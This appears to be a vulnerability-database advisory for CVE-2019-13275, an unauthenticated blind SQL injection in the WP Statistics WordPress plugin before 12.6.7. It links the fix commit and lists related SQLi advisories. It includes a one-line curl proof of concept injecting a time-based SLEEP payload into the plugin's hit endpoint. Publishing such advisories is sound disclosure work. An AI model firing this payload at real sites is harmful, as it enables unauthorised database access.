WP Statistics < 12.6.7 – Unauthenticated Blind SQL Injection | CVE 2019-13275 | Plugin Vulnerabilities

Description

An endpoint of the API, which is exposed when the 'use cache plugin' setting is enabled (by default disabled), is vulnerable to an unauthenticated blind SQLi issue.

Proof of Concept

time curl -X POST 'http://host/wp-json/wpstatistics/v1/hit' --data "wp_statistics_hit=x&wp_statistics_hit[track_all]=1&wp_statistics_hit[page_uri]=x&wp_statistics_hit[search_query]=x\' UNION ALL SELECT SLEEP(5)-- x"

Affects Plugins

Fixed in 12.6.7

References

CVE

URL

https://github.com/wp-statistics/wp-statistics/commit/bd46721b97794a1b1520e24ff5023b6da738dd75

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Thomas Chauchefoin

Verified

No

WPVDB ID

d3885cc1-a277-4402-a971-0fe7ccd87687

Timeline

Publicly Published

2019-07-01 (about 6 years ago)

Added

2019-07-01 (about 6 years ago)

Last Updated

2020-09-22 (about 5 years ago)

Other

Published

Title

Published

2024-12-13

Title

WP Job Portal < 2.2.3 - Authenticated (Admin+) SQL Injection via getFieldsForVisibleCombobox()

Published

2026-02-06

Title

The Bucketlister <= 0.1.5 - Authenticated (Contributor+) SQL Injection via `category` and `id` Shortcode Attributes

Published

2015-12-17

Title

Welcart e-Commerce < 1.5.3 - SQL Injection

Published

2023-06-19

Title

MStore API < 3.9.8 - Unauthenticated Blind SQLi

Published

2017-03-20

Title

Search Everything < 8.1.7 - SQL Injection